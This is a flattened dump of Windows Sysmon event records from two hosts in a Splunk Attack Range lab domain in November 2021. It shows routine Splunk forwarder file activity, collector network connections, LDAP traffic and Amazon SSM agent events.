Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=787760173ABC4E04DEB7BF5CD47F93B8,SHA256=97ED441BE03CBDB1E74EB42D692F813C01E373BB3F96D9B8A3C780E2DA5B66BFfalsetrue 23542300x800000000000000021219650Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:16.837{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2BE18892FB9EB0C2C170630D8DB2608,SHA256=B2272378EDFB1313DBF254684DD4DEE3165C90F603FFC24A788B5157CA08D823,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345721Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:16.244{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345720Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:16.244{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2CFD130DE93051174AEE71631857C5C4,SHA256=8C62CBB7F198879ABDA80A514085591F46924A55A43E81B1A964140C5DD961E1falsetrue 11241100x800000000000000057345719Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:16.144{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345718Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:16.144{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7E2625CED6EF9D8B6B2E407ABA88898,SHA256=CB20615853255880D71F122C1CC67C8629E1EAD336289FEA203BFB31F08972F5falsetrue 23542300x800000000000000021219649Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:16.259{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=22A94F863D2D6075F18D84390128587E,SHA256=66DD4936AF2EC390A3E47E0CD93B9AF6FA443DD5C628B33E9351D423A9238417,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000021219652Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:03.462{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64324-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219651Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:17.837{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD8B0D18EC321528ED2A79CDD5602485,SHA256=8D53DDF7037E5E87FF4244CAFCDF89526FC4B414B9B0890105BCE94D8A78A0C6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057345724Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:47.582{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54544-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x800000000000000057345723Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:17.146{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345722Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:17.146{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15D806C4C8BDDF408D081E6044533939,SHA256=D6AB9BD35B7EC44B9667E0E6E33065369775521A8D6AEE51F91746CE7B9A7413falsetrue 23542300x800000000000000021219653Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:18.884{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D273E2E84CB9FF458136B933185D83BF,SHA256=AA20729179FF06F4D5F31B7C47C867A4FEB75A7D5C35A3DB8A5B72DE121B88BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 12241200x800000000000000057345728Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:17:18.391{8B6011A9-887D-6164-2800-00000000F101}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000057345727Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:17:18.391{8B6011A9-887D-6164-2800-00000000F101}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 11241100x800000000000000057345726Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:18.160{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345725Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:18.160{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B0B6C0B2DA605B0FC5282BC6B35B966,SHA256=DFBA5CD5DD31329A09E0F5CDBBCEB4FAE1F8C51AAB4F67C828EF4294E36DAEFFfalsetrue 23542300x800000000000000021219656Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:19.886{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1501DC9E64A24116144676247A580A5A,SHA256=2A2AB26E57F175501C2C995FE710D176712218BADFB546EFB4931FFC2D32EEF5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345732Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:19.412{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345731Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:19.412{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=931255CC5F81FAC155160803A8B39F75,SHA256=8AC252F93EE693F363C5D2F84F6E5BE394686EEDB8E610980EAAFF093691A5E9falsetrue 11241100x800000000000000057345730Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:19.174{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345729Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:19.174{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6FC4295E875E7430E908C75B64FAA2F,SHA256=BB63A5224BDE3355C4AF852FB518B35FF6C532251EA5859C841A01F5D4BA1188falsetrue 10341000x800000000000000021219655Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:19.165{AD5E2759-5433-6143-0D00-00000000F101}7923680C:\Windows\system32\svchost.exe{AD5E2759-A1B2-6168-2961-04000000F101}3520C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219654Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:19.165{AD5E2759-5433-6143-0D00-00000000F101}7923680C:\Windows\system32\svchost.exe{AD5E2759-5433-6143-0C00-00000000F101}732C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000021219658Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:20.894{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0AFBC249A0A64C537D6B1D0A34A85D30,SHA256=87AB8B3C3FE969F119962BC108640CDE690D6C29247C4F309B5A18F0DEEE577C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057345736Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:50.744{8B6011A9-886B-6164-0B00-00000000F101}648C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-469.attackrange.local54545-true0:0:0:0:0:0:0:1win-dc-469.attackrange.local389ldap 354300x800000000000000057345735Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:50.744{8B6011A9-887D-6164-2800-00000000F101}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-469.attackrange.local54545-true0:0:0:0:0:0:0:1win-dc-469.attackrange.local389ldap 11241100x800000000000000057345734Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:20.189{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345733Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:20.189{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49CB591784B43E5005AF4E8B8E277C09,SHA256=487AC7AA9B71B0CA899FA419A671BC0889E0A299B3F01037AD28A838FF09DB68falsetrue 23542300x800000000000000021219657Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:20.342{AD5E2759-5433-6143-1A00-00000000F101}1972NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-09909a0b10b828df0\channels\health\respondent-20210916142702-79908MD5=8085950F126672766A1DF0580C539A31,SHA256=836015C54DD1F9176CE157D9E23B9B47C196C9CF50DD587B63CC20EE15FEF46E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219661Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:21.895{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F977431FC694C4C0A268E372ED8C880,SHA256=2231CA91E18507AC1F79D45546A94390F19CEFCC634037345A8D85B2AA45DC83,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345738Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:21.225{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345737Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:21.225{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71BC18C1E0F01F82D1FE454EBFDD2E77,SHA256=F3DE9402BDDB5F3DC6D227A37EF6F34C7023E5A8A7F00D2318531FEDF944FF28falsetrue 23542300x800000000000000021219660Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:21.348{AD5E2759-5433-6143-1A00-00000000F101}1972NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-09909a0b10b828df0\channels\health\surveyor-20210916142700-79909MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219659Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:21.144{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=25DA1F5B9744D0568C23BD921712D498,SHA256=EC228065D8C67C91A3468C4EBD47DEAA1B9318EB57DFED1FC35AB7F5AB600A44,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000021219663Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:08.542{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64325-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219662Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:22.895{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47FD313176A12896C53F06D88F10AB3E,SHA256=44123897069808120A502F6C942FC9EB98BB0B63E8B5E6A39E24EF11D441D775,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345742Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:22.256{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345741Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:22.256{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=265C4EFD9D450F4933FF2CF66E594EF6,SHA256=B9F86FEBCCB0BDC9AE189DD7777185DAE0FD8206C012596200425EE0702B003Dfalsetrue 11241100x800000000000000057345740Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:22.224{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345739Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:22.224{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=91414562B5F9D43786B7837F8092A7C1,SHA256=B0E76EB67DD7D22310F6F40E299FCA0E8A4671D814272BB25E794DB0DDF70BCDfalsetrue 23542300x800000000000000021219664Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:23.895{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82E31B0A8953A1A68EF27AA9494FCC99,SHA256=07617583E311AFFF6E6774FC0E6A46307D7F3C76801838FEA21AF6F18B5E4C48,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345747Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:23.623{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345746Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:23.623{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B6DA5702FC5CEF6ADB9AACF14D4530EC,SHA256=EB6DF6A1F97596CD2EB79C83A37E335C6E4B3FDE50B51C3D7FEBC85B036C6036falsetrue 354300x800000000000000057345745Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:53.560{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54546-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x800000000000000057345744Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:23.304{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345743Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:23.304{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCF5FC3E7CBCBFEA1EBCF01ABFBB26F9,SHA256=A831642C4D537FC0B11F22FF4CD34A3B1BB2EDBCA683B26F638CA5DFE84CF4F4falsetrue 23542300x800000000000000021219665Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:24.895{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AC8491D196A48EFBB1D80F697D6E5C3,SHA256=89137BB6AABEB95A2F492F8D48763D32EFF9C0DA2EA3D69327154E0BB15CBEBD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345749Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:24.322{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345748Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:24.322{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9212B8BADB393763B1353986B34F461C,SHA256=4A697486021F7063DC5E7E845096283F5EB822DB271C5CAFA739EBCC036AB796falsetrue 23542300x800000000000000021219666Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:25.926{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14FC8FC2434C9639BB69CB13E72E32AA,SHA256=2775B37D2ACDB647561BAC098D986B7FFA2BAB695E368AB1EE78292E155B7E7A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345751Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:25.337{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345750Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:25.337{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBAE1B77ED7B940838FC4C9768630C90,SHA256=B9FDCA510E919F4CF2F52A76496A4181EA3F2284854D67DB47EAAF5AE61677B7falsetrue 23542300x800000000000000021219667Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:26.957{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72EC42935B2375E10D3B43E26BF11BDF,SHA256=4220118728EAF62C39B333BD661AFEBF03CBB2A50E8184CF99AAED369CF06BB7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345753Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:26.351{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345752Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:26.351{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2A45951BD83710EC905BADF9CB2A304,SHA256=AC85028968DB48283AEE178C7550AD421200325812DE0C9ECC07A9A39059A315falsetrue 11241100x800000000000000057345755Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:27.366{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345754Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:27.366{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB88791E81CED32839FB02277B1FC7A4,SHA256=D158B6759B013ABF451FA7199D741B87AA9F17DBB649558F4BBDDA03FCC960FCfalsetrue 23542300x800000000000000021219669Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:27.067{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CCC66E5EA592939C5F379276FBA6A607,SHA256=9ACD7FFB785EC18386225DE6D1047B04755AE5B0562156AC3BA0F265371E08CA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219668Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 